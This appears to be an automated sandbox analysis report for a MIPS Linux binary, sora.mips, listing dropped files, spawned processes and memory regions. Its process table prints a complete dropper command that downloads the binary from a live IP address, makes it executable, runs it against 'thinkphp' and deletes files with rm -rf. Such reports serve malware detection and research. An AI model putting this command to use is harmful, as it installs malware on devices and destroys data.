Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
/usr/bin/sora.mips
|
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
|
dropped
|
 |
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/bin/sh
|
/bin/sh -c "curl cd /tmp; wget http://185.196.11.177/bins/sora.mips; chmod 777 *; ./sora.mips thinkphp; rm -rf *"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/curl
|
curl cd /tmp
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/wget
|
wget http://185.196.11.177/bins/sora.mips
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod 777 2to3-2.7 7z 7za 7zr GET HEAD NF POST Thunar VGAuthService X X11 Xephyr Xorg Xwayland [ aa-enabled aa-exec aconnect
acpi_listen add-apt-repository addpart addr2line al al2 alsabat alsaloop alsamixer alsatplg alsaucm amidi amixer apg apgbfm
aplay aplaymidi apport-bug apport-cli apport-collect apport-unpack appres appstreamcli aprofutil apropos apt apt-add-repository
apt-cache apt-cdrom apt-config apt-extracttemplates apt-ftparchive apt-get apt-key apt-mark apt-sortpkgs aptdcon apturl apturl-gtk
ar arch arecord arecordmidi arm2hpdl as aseqdump aseqnet asp-state4 aspell aspell-import at atobm atq atril atril-previewer
atril-thumbnailer atrm automat-visualize3 avahi-browse avahi-browse-domains avahi-publish avahi-publish-address avahi-publish-service
avahi-resolve avahi-resolve-address avahi-resolve-host-name avahi-set-host-name awk axfer b2sum base32 base64 basename bash
bashbug batch bc bccmd bdftopcf
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/sora.mips
|
./sora.mips thinkphp
|
||
|
/usr/bin/sora.mips
|
-
|
||
|
/usr/bin/sora.mips
|
-
|
||
|
/usr/bin/sora.mips
|
-
|
||
|
/usr/bin/sora.mips
|
-
|
||
|
/usr/bin/sora.mips
|
-
|
||
|
/usr/bin/sora.mips
|
-
|
||
|
/usr/bin/sora.mips
|
-
|
||
|
/usr/bin/sora.mips
|
-
|
||
|
/usr/bin/sora.mips
|
-
|
||
|
/usr/bin/sora.mips
|
-
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/rm
|
rm -rf 2to3-2.7 7z 7za 7zr GET HEAD NF POST Thunar VGAuthService X X11 Xephyr Xorg Xwayland [ aa-enabled aa-exec aconnect
acpi_listen add-apt-repository addpart addr2line al al2 alsabat alsaloop alsamixer alsatplg alsaucm amidi amixer apg apgbfm
aplay aplaymidi apport-bug apport-cli apport-collect apport-unpack appres appstreamcli aprofutil apropos apt apt-add-repository
apt-cache apt-cdrom apt-config apt-extracttemplates apt-ftparchive apt-get apt-key apt-mark apt-sortpkgs aptdcon apturl apturl-gtk
ar arch arecord arecordmidi arm2hpdl as aseqdump aseqnet asp-state4 aspell aspell-import at atobm atq atril atril-previewer
atril-thumbnailer atrm automat-visualize3 avahi-browse avahi-browse-domains avahi-publish avahi-publish-address avahi-publish-service
avahi-resolve avahi-resolve-address avahi-resolve-host-name avahi-set-host-name awk axfer b2sum base32 base64 basename bash
bashbug batch bc bccmd bdftopcf
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/libexec/gvfsd-fuse
|
-
|
||
|
/usr/lib/systemd/systemd
|
-
|
There are 42 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://upx.sf.net
|
unknown
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f020c414000
|
page execute read
|
|
||
|
7f020c414000
|
page execute read
|
|
||
|
7f020c414000
|
page execute read
|
|
||
|
7f020c414000
|
page execute read
|
|
||
|
7f020c414000
|
page execute read
|
|
||
|
7f020c414000
|
page execute read
|
|
||
|
7f020c414000
|
page execute read
|
|
||
|
7f020c414000
|
page execute read
|
|
||
|
7f020c467000
|
page read and write
|
|||
|
7f020c456000
|
page read and write
|
|||
|
5651e0f18000
|
page execute and read and write
|
|||
|
7f0293614000
|
page read and write
|
|||
|
7f0292fbc000
|
page read and write
|
|||
|
7f029361c000
|
page read and write
|
|||
|
5651def1a000
|
page read and write
|
|||
|
5651def1a000
|
page read and write
|
|||
|
5651def10000
|
page read and write
|
|||
|
7f0292f99000
|
page read and write
|
|||
|
7f0293661000
|
page read and write
|
|||
|
7f02934eb000
|
page read and write
|
|||
|
5651e0fef000
|
page read and write
|
|||
|
7f029293a000
|
page read and write
|
|||
|
7f0292fbc000
|
page read and write
|
|||
|
7ffecd558000
|
page execute read
|
|||
|
7f029293a000
|
page read and write
|
|||
|
7f028c021000
|
page read and write
|
|||
|
7f020c458000
|
page read and write
|
|||
|
7f028c021000
|
page read and write
|
|||
|
7ffecd558000
|
page execute read
|
|||
|
7f0292132000
|
page read and write
|
|||
|
5651e0fef000
|
page read and write
|
|||
|
7f020c140000
|
page execute and read and write
|
|||
|
7f0293614000
|
page read and write
|
|||
|
7f029330a000
|
page read and write
|
|||
|
7f0293661000
|
page read and write
|
|||
|
7f0293661000
|
page read and write
|
|||
|
5651e0f2f000
|
page read and write
|
|||
|
7f02934eb000
|
page read and write
|
|||
|
7f028c000000
|
page read and write
|
|||
|
7f0292fbc000
|
page read and write
|
|||
|
5651e0f18000
|
page execute and read and write
|
|||
|
7f0292f99000
|
page read and write
|
|||
|
5651dec88000
|
page execute read
|
|||
|
5651e0fef000
|
page read and write
|
|||
|
7f0292948000
|
page read and write
|
|||
|
5651e0fef000
|
page read and write
|
|||
|
7f029330a000
|
page read and write
|
|||
|
7f029330a000
|
page read and write
|
|||
|
7f0292948000
|
page read and write
|
|||
|
5651def1a000
|
page read and write
|
|||
|
7ffecd558000
|
page execute read
|
|||
|
7f029330a000
|
page read and write
|
|||
|
5651def10000
|
page read and write
|
|||
|
7f028c021000
|
page read and write
|
|||
|
7ffecd554000
|
page read and write
|
|||
|
7f0292bf8000
|
page read and write
|
|||
|
7f0292948000
|
page read and write
|
|||
|
5651e0f18000
|
page execute and read and write
|
|||
|
7f02934eb000
|
page read and write
|
|||
|
7f0292fd9000
|
page read and write
|
|||
|
7f020c140000
|
page execute and read and write
|
|||
|
5651e0f18000
|
page execute and read and write
|
|||
|
5651def10000
|
page read and write
|
|||
|
5651e0f18000
|
page execute and read and write
|
|||
|
5651def1a000
|
page read and write
|
|||
|
7f0292132000
|
page read and write
|
|||
|
7f028c021000
|
page read and write
|
|||
|
7f020c456000
|
page read and write
|
|||
|
7f0293661000
|
page read and write
|
|||
|
7f020c456000
|
page read and write
|
|||
|
7f0292948000
|
page read and write
|
|||
|
7f028c000000
|
page read and write
|
|||
|
7f029361c000
|
page read and write
|
|||
|
5651dec88000
|
page execute read
|
|||
|
7f0293614000
|
page read and write
|
|||
|
7f02934eb000
|
page read and write
|
|||
|
7f0292fbc000
|
page read and write
|
|||
|
7f0292fd9000
|
page read and write
|
|||
|
7f0292f99000
|
page read and write
|
|||
|
7f0293661000
|
page read and write
|
|||
|
7f0292948000
|
page read and write
|
|||
|
7f0292fbc000
|
page read and write
|
|||
|
7f0292132000
|
page read and write
|
|||
|
7f0292132000
|
page read and write
|
|||
|
5651def10000
|
page read and write
|
|||
|
7ffecd554000
|
page read and write
|
|||
|
5651e0f2f000
|
page read and write
|
|||
|
5651e0fef000
|
page read and write
|
|||
|
7f029361c000
|
page read and write
|
|||
|
5651e1017000
|
page read and write
|
|||
|
7f0292fd9000
|
page read and write
|
|||
|
7f020c456000
|
page read and write
|
|||
|
5651e0fef000
|
page read and write
|
|||
|
5651e100f000
|
page read and write
|
|||
|
7f0292fd9000
|
page read and write
|
|||
|
7f0293614000
|
page read and write
|
|||
|
7f020c456000
|
page read and write
|
|||
|
7f028c021000
|
page read and write
|
|||
|
5651def1a000
|
page read and write
|
|||
|
5651e103b000
|
page read and write
|
|||
|
7ffecd558000
|
page execute read
|
|||
|
7f0292948000
|
page read and write
|
|||
|
7f028c000000
|
page read and write
|
|||
|
7f0292f99000
|
page read and write
|
|||
|
5651dec88000
|
page execute read
|
|||
|
7f0292132000
|
page read and write
|
|||
|
7f020c469000
|
page read and write
|
|||
|
7f020c140000
|
page execute and read and write
|
|||
|
5651def1a000
|
page read and write
|
|||
|
7f029330a000
|
page read and write
|
|||
|
5651def10000
|
page read and write
|
|||
|
5651dec88000
|
page execute read
|
|||
|
7ffecd554000
|
page read and write
|
|||
|
7f0293614000
|
page read and write
|
|||
|
7f029361c000
|
page read and write
|
|||
|
5651e0f18000
|
page execute and read and write
|
|||
|
7f0293614000
|
page read and write
|
|||
|
7ffecd558000
|
page execute read
|
|||
|
7f020c140000
|
page execute and read and write
|
|||
|
7f0292132000
|
page read and write
|
|||
|
7f029361c000
|
page read and write
|
|||
|
7f028c021000
|
page read and write
|
|||
|
5651dec88000
|
page execute read
|
|||
|
7f02934eb000
|
page read and write
|
|||
|
5651e0f18000
|
page execute and read and write
|
|||
|
7f0292fd9000
|
page read and write
|
|||
|
7f0292bf8000
|
page read and write
|
|||
|
7f0292fd9000
|
page read and write
|
|||
|
7ffecd558000
|
page execute read
|
|||
|
7f0292948000
|
page read and write
|
|||
|
5651e100f000
|
page read and write
|
|||
|
7f028c021000
|
page read and write
|
|||
|
7ffecd554000
|
page read and write
|
|||
|
7f0292132000
|
page read and write
|
|||
|
7f0293614000
|
page read and write
|
|||
|
7f0292fbc000
|
page read and write
|
|||
|
7ffecd554000
|
page read and write
|
|||
|
7f029361c000
|
page read and write
|
|||
|
7f028c000000
|
page read and write
|
|||
|
7f028c000000
|
page read and write
|
|||
|
7f0292132000
|
page read and write
|
|||
|
7ffecd554000
|
page read and write
|
|||
|
7f029293a000
|
page read and write
|
|||
|
5651e0f18000
|
page execute and read and write
|
|||
|
7f020c140000
|
page execute and read and write
|
|||
|
7f029293a000
|
page read and write
|
|||
|
7f0292bf8000
|
page read and write
|
|||
|
5651e0f2f000
|
page read and write
|
|||
|
7f029361c000
|
page read and write
|
|||
|
5651e0fef000
|
page read and write
|
|||
|
7f02934eb000
|
page read and write
|
|||
|
7f0292f99000
|
page read and write
|
|||
|
7f0292fbc000
|
page read and write
|
|||
|
7f029330a000
|
page read and write
|
|||
|
7ffecd554000
|
page read and write
|
|||
|
7f029330a000
|
page read and write
|
|||
|
5651dec88000
|
page execute read
|
|||
|
7f029293a000
|
page read and write
|
|||
|
7f020c456000
|
page read and write
|
|||
|
7f0292f99000
|
page read and write
|
|||
|
7f0293661000
|
page read and write
|
|||
|
7f0292bf8000
|
page read and write
|
|||
|
5651e0f2f000
|
page read and write
|
|||
|
7f0292bf8000
|
page read and write
|
|||
|
7f02934eb000
|
page read and write
|
|||
|
7ffecd558000
|
page execute read
|
|||
|
5651def1a000
|
page read and write
|
|||
|
7f0293614000
|
page read and write
|
|||
|
7f0292f99000
|
page read and write
|
|||
|
5651dec88000
|
page execute read
|
|||
|
7f020c140000
|
page execute and read and write
|
|||
|
7f020c458000
|
page read and write
|
|||
|
7f0293661000
|
page read and write
|
|||
|
5651def10000
|
page read and write
|
|||
|
7f020c140000
|
page execute and read and write
|
|||
|
7f020c456000
|
page read and write
|
|||
|
7f028c000000
|
page read and write
|
|||
|
7ffecd554000
|
page read and write
|
|||
|
5651e0f2f000
|
page read and write
|
|||
|
7f0292948000
|
page read and write
|
|||
|
5651e0f2f000
|
page read and write
|
|||
|
7f0292fbc000
|
page read and write
|
|||
|
7f0292bf8000
|
page read and write
|
|||
|
5651e100f000
|
page read and write
|
|||
|
7f029293a000
|
page read and write
|
|||
|
7f029361c000
|
page read and write
|
|||
|
7f0292bf8000
|
page read and write
|
|||
|
7f0292bf8000
|
page read and write
|
|||
|
7f0292f99000
|
page read and write
|
|||
|
5651dec88000
|
page execute read
|
|||
|
7f029330a000
|
page read and write
|
|||
|
5651e0fef000
|
page read and write
|
|||
|
5651def10000
|
page read and write
|
|||
|
5651e0f2f000
|
page read and write
|
|||
|
7f0292fd9000
|
page read and write
|
|||
|
7f02934eb000
|
page read and write
|
|||
|
7f020c140000
|
page execute and read and write
|
|||
|
7f028c021000
|
page read and write
|
|||
|
5651def10000
|
page read and write
|
|||
|
7f028c000000
|
page read and write
|
|||
|
5651def1a000
|
page read and write
|
|||
|
7f029293a000
|
page read and write
|
|||
|
7f029293a000
|
page read and write
|
|||
|
7f0292fd9000
|
page read and write
|
|||
|
7f028c000000
|
page read and write
|
|||
|
7f020c456000
|
page read and write
|
|||
|
5651e0f2f000
|
page read and write
|
|||
|
7ffecd558000
|
page execute read
|
|||
|
7f0293661000
|
page read and write
|
There are 199 hidden memdumps, click here to show them.